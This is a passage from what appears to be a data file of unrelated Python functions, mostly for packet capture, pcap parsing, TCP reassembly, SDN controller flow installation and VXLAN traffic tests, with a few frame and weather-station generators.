packet['dst_domain']), end='')\n else:\n print('%s --> %s' % (net_utils.inet_to_str(packet['src']), net_utils.inet_to_str(packet['dst'])), end='')\n else:\n print(str(packet))\n\n # Only include application if we have it\n if item['application']:\n print('Application: %s' % item['application']['type'], end='')\n print(str(item['application']), end='')\n\n # Just for newline\n print()", "def get_pcap_traffic_series(self):\n parsed_pcap_data = {}\n\n if (self.mac_address_binary is not None):\n parsed_pcap_data[self.mac_address_binary] = []\n\n with open(self.pcap_file_path, 'rb') as pcap_file:\n try:\n pcap = dpkt.pcap.Reader(pcap_file)\n for ts, buf in pcap:\n # Skip non ethernet frames\n try:\n eth = dpkt.ethernet.Ethernet(buf)\n except:\n continue\n\n # Skip non-IP packets\n if eth.type != 2048:\n continue\n \n # Apply eth filter\n if (self.mac_address_binary is not None):\n self.append_data(parsed_pcap_data, self.mac_address_binary, eth, ts)\n else:\n if (eth.src not in parsed_pcap_data):\n parsed_pcap_data[eth.src] = []\n if (eth.dst not in parsed_pcap_data):\n parsed_pcap_data[eth.dst] = []\n\n self.append_data(parsed_pcap_data, eth.src, eth, ts)\n self.append_data(parsed_pcap_data, eth.dst, eth, ts)\n except:\n print \"Error parsing file: %s\" % pcap_file\n \n # Remove mac addresses that didn't send data\n receivers_only = []\n for mac_addr in parsed_pcap_data:\n data_sent = False\n for data in parsed_pcap_data[mac_addr]:\n if (data[1] > 0):\n data_sent = True\n break\n if (not data_sent):\n receivers_only.append(mac_addr)\n\n for mac_addr in receivers_only:\n parsed_pcap_data.pop(mac_addr, None)\n\n # Sort the data \n for mac_addr in parsed_pcap_data:\n series = sorted(parsed_pcap_data[mac_addr], key=operator.itemgetter(0))\n parsed_pcap_data[mac_addr] = series\n\n return parsed_pcap_data", "def _parse(self):\n \n # HUA determine the host ip address\n # read 20 packages and set the most frequent one\n ips_dict = {}\n count = 0\n for raw_packet in self.raw_packets:\n if count > 100: break\n ethernet = Ethernet(raw_packet[0:14])\n if(ethernet.type != 'IP'):\n continue\n ip = Ip(raw_packet[14:])\n if(ip.protocol != 'TCP') :\n continue\n if(ip.src not in ips_dict):\n ips_dict[ip.src] = 0\n ips_dict[ip.src] += 1\n if(ip.dst not in ips_dict):\n ips_dict[ip.dst] = 0\n ips_dict[ip.dst] += 1\n # get the most frequent one\n max_appear = 0\n ip = None\n for key, value in ips_dict.items():\n if value > max_appear:\n ip = key\n max_appear = value\n\n global _device_ip\n if not self.enableFilter or not _device_ip:\n _device_ip = ip\n\n global _tcp_buf\n _tcp_buf = {}\n number = 0\n self.begin_ts = self.packet_headers[-1]['ts']\n rcount = 0\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n pcap_packet.pcap_num = rcount#number # add one to be consistent with wireshark\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n \n rcount += 1\n\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n\n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n\n\n\n\n # just collect the packets between \n \n if self.enableFilter and not (pcap_packet.ip.src == _device_ip and pcap_packet.ip.dst == SERVER_IP) \\\n and not (pcap_packet.ip.dst == _device_ip and pcap_packet.ip.src == SERVER_IP):\n #print \"Ignore ip not ok\"\n continue\n '''\n if rcount < 10 or rcount > 2600:\n print 'rcount %d, time %d ---: %f' % (rcount, number, self.packet_headers[rcount - 1]['ts'] - self._ts_base)\n '''\n \n self.pcap_packets.append(pcap_packet)\n \n\n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n\n\n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip, number)\n\n if pcap_packet.ip.src == _device_ip:\n pcap_packet.tcp.direction = \"out\"\n else:\n pcap_packet.tcp.direction = \"in\"\n\n\n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, number)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n number += 1\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def _parse(self):\n \n global _tcp_buf\n _tcp_buf = {}\n number = 1\n for raw_packet in self.raw_packets:\n pcap_packet = Pcap_packet()\n self.pcap_packets.append(pcap_packet)\n pcap_packet.pcap_num = number\n number += 1\n pcap_packet.top_layer = 1\n pcap_packet.ethernet = Ethernet(raw_packet[0:14])\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n pcap_packet.top_layer = 2\n pcap_packet.ip = Ip(raw_packet[14:])\n \n #skip the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n pcap_packet.top_layer = 3\n pcap_packet.tcp = Tcp(pcap_packet.ip.packet[pcap_packet.ip.header_len: ])\n \n #skip the packets that is not http packet\n if (pcap_packet.tcp.src_port != 80 and pcap_packet.tcp.dst_port != 80):\n continue\n \n #dispatch the tcp into tcp streams\n self._add_pkt_into_tcp_stream(pcap_packet, pcap_packet.pcap_num)\n \n #reassemble tcp packet\n self._tcp_reassemble(pcap_packet.pcap_num, pcap_packet.ip.src, pcap_packet.ip.dst, pcap_packet.tcp)\n #endof for\n #flush the tcp_buf, other wise it will lose some http response\n for sockets in _tcp_buf.keys():\n self._tcp_flush(sockets)\n del _tcp_buf[sockets]", "def parse_pkt_list(self, pkt_list):\n flow_pkts = {}\n for (t, pkt) in pkt_list:\n flowID = self.extract_flowID(pkt)\n if flowID not in flow_pkts.keys():\n flow_pkts[flowID] = [(t, pkt)]\n else:\n flow_pkts[flowID].append((t,pkt))\n return flow_pkts", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def cleanse(packets):\n pkts = []\n retran = False\n lost = False\n for pkt in packets:\n if len(pkt['data']) > 0:\n # If first packet just add and move on\n if len(pkts) == 0:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is = to this one add this pkt\n elif pkt['tcp']['seq_num'] == next_seq:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is > than this one there is a \n # Retransmission\n elif pkt['tcp']['seq_num'] < next_seq:\n retran = True\n elif pkt['tcp']['seq_num'] > next_seq:\n lost = True\n else:\n pass\n\n return pkts, retran, lost", "def tcp_traceflow(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n protocol=LINKTYPE.get(packet.name.upper()), # data link type from global header\n index=count, # frame number\n frame=packet2dict(packet), # extracted packet\n syn=bool(tcp.flags.S), # TCP synchronise (SYN) flag\n fin=bool(tcp.flags.F), # TCP finish (FIN) flag\n src=ipaddress.ip_address(ip.src), # source IP\n dst=ipaddress.ip_address(ip.dst), # destination IP\n srcport=tcp.sport, # TCP source port\n dstport=tcp.dport, # TCP destination port\n timestamp=time.time(), # timestamp\n )\n return True, data\n return False, None", "def read_packets(serial_input):\n while 1:\n header = scan_to_headerword(serial_input)\n yield header.read_packet(serial_input)", "def next_batch(self):\n\n while self.cap.isOpened():\n flag, frame = self.cap.read()\n yield frame", "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect decapsulation'\n print(\"Correct decapsulation\")", "def parse_pkt_list(self, log_pkt_list):\n flow_pkts = {}\n for pkt in log_pkt_list:\n flowID = pkt.flowID\n if flowID not in flow_pkts.keys():\n flow_pkts[flowID] = [(pkt.time, pkt)]\n else:\n flow_pkts[flowID].append((pkt.time, pkt))\n return flow_pkts", "def group_packets(self, packets):\n sessions = packets.sessions() # groups connections from X to Y as a Scapy PacketList in a dict\n # example: dict['TCP 172.217.17.102:443 > 10.7.2.60:38386'] = PacketList\n\n session_keys = list(sessions.keys()) # force copy so we can alter the dictionary at runtime\n for key in session_keys:\n reversed_key = self.reverse_dict_key(key)\n if(reversed_key != key and sessions.__contains__(reversed_key)):\n sessions[key] += sessions.pop(reversed_key)\n session_keys.remove(reversed_key)\n\n return self.sort_grouped_packets(list(sessions.values()))", "def pkt_gen(self, flow_id):\n i = 0\n fin_time = 0\n while i < self.num_pkts:\n #j = 0\n burst_len = 0\n #pyld = ''.join(choice(ascii_uppercase) for k in range(randint(6, 1460)))\n pyld = ''.join(choice(ascii_uppercase) for k in range(202))\n # create the test packets\n pkt = Ether()/IP()/TCP()/Raw(load=pyld)\n fin_time = round((len(pkt)/self.quantum)/self.weight)\n pkt_id = (flow_id, i)\n tuser = Tuser(len(pkt), fin_time, pkt_id)\n burst_len += len(pkt)\n print ('@ {:.2f} - Send: {} || {}'.format(self.env.now, pkt.summary(), tuser))\n\n # write the pkt and metadata into storage\n self.pkt_out_pipe.put((pkt, tuser))\n\n #j += 1\n i += 1\n if i == self.num_pkts:\n break\n \n # wait a number of clock cycles equivalent to the transmission time of the burst of packets\n #for j in range(PREAMBLE + len(pkt) + IFG):\n #yield self.wait_line_clks(j*self.PREAMBLE + burst_len + j*self.IFG)\n #print (\"f: {} - pkt end: {}\".format(self.flow_id, self.env.now))\n pkt_time = self.PREAMBLE + burst_len + self.IFG\n yield self.wait_line_clks(pkt_time)\n # Insert gap to maintain bit rate\n idle_time = round(pkt_time * self.idle_frac/self.actv_frac)\n #yield self.wait_line_clks(idle_time) # average gap is 64 bytes\n print (\"pkt_time: {} idle_time: {}\".format(pkt_time, idle_time))", "def sniff_continuously(self, packet_count=None):\n \n self.lcapture_tshark = (self.lcapture_tshark or \n self.eventloop.run_until_complete(self._get_tshark_process()))\n\n self._running_processes.add(self.lcapture_tshark)\n\n # Retained for backwards compatibility and to add documentation.\n return self._packets_from_tshark_sync(packet_count=packet_count, \n tshark_process=self.lcapture_tshark)", "def process_pcap(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n self.process_pkts(pkts)", "def sniff_traffic(hs, count, timeout, traffic_type, pkt_type, exp_dst, step):\n iface = hs.ports['eth1']\n step('Scapy capture started')\n if (traffic_type == \"encap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, timeout={}, \"\n \" filter='port 4789 and (!icmp or !ip6)', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)\n elif (traffic_type == \"decap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, \"\n \" timeout={}, filter='!icmp or !ip6', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)", "def _packets_from_tshark_sync(self, tshark_process, packet_count=None, timeout:float=3.0,\n max_data_length:int=10000):\n # NOTE: This has code duplication with the async version, think about how to solve this\n\n psml_structure, data = self.eventloop.run_until_complete(self._get_psml_struct(tshark_process.stdout))\n packets_captured = 0\n\n data = b\"\"\n try:\n while self.is_open.value:\n try:\n packet, data = self.eventloop.run_until_complete(\n self._get_packet_from_stream(tshark_process.stdout, \n data,\n psml_structure=psml_structure,\n got_first_packet=packets_captured > 0, \n timeout=timeout))\n except EOFError:\n echo(\"Caught EOF\", file=Interceptor.stdout)\n self._log.debug(\"EOF reached (sync)\")\n break\n\n if(packet is False): continue\n\n if packet:\n packets_captured += 1\n yield packet\n if packet_count and packets_captured >= packet_count:\n break\n if len(data) > max_data_length:\n data = b''\n finally:\n if tshark_process in self._running_processes:\n self.eventloop.run_until_complete(self._cleanup_subprocess(tshark_process))", "def process(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n if self.sip and self.dip and self.sp and self.dp:\n self.process_pkts(pkts)", "def _convert_packets_into_batch(self, packets):\n def filter_non_bootstrap_nodes():\n for candidate, packet in packets:\n cid = packet[2:22]\n\n if not cid in self._communities and False: # candidate.sock_addr[0] in self._non_autoload:\n if __debug__:\n logger.warn(\"drop a %d byte packet (received from non-autoload node) from %s\", len(packet), candidate)\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:from bootstrap node for unloaded community\")\n continue\n\n yield candidate, packet\n\n packets = list(filter_non_bootstrap_nodes())\n if packets:\n return super(TrackerDispersy, self)._convert_packets_into_batch(packets)\n\n else:\n return []", "def capture_packets(self, interface, count=1, timeout=None):\n if interface not in self.packet_captures:\n raise ObjectNotFoundException(\n 'No packet capture is running or was run on host/interface' +\n self.name + '/' + interface)\n tcpd = self.packet_captures[interface]\n return tcpd.wait_for_packets(count, timeout)", "def genLoopPackets(self):\n\n for p in self.get_observations():\n ts = int(time.time() + 0.5)\n packet = pywws2weewx(p, ts,\n self._last_rain_loop, self._last_rain_ts_loop,\n self.max_rain_rate)\n self._last_rain_loop = packet['rainTotal']\n self._last_rain_ts_loop = ts\n if packet['status'] != self._last_status:\n log.info('station status %s (%s)' % \n (decode_status(packet['status']), packet['status']))\n self._last_status = packet['status']\n yield packet", "def next_batch(self, frame_skip_count=5):\n frame_count = 0\n frame_divisor = max(frame_skip_count + 1, 1)\n while True:\n ret, frame = self.cap.read()\n if ret:\n if frame_count % frame_divisor == 0:\n yield frame\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n frame_count += 1\n else:\n break", "def _convert_packets_into_batch(self, packets):\n assert isinstance(packets, (tuple, list))\n assert len(packets) > 0\n assert all(isinstance(packet, tuple) for packet in packets)\n assert all(len(packet) == 2 for packet in packets)\n assert all(isinstance(packet[0], Candidate) for packet in packets)\n assert all(isinstance(packet[1], str) for packet in packets)\n\n for candidate, packet in packets:\n # find associated community\n try:\n community = self.get_community(packet[2:22])\n except 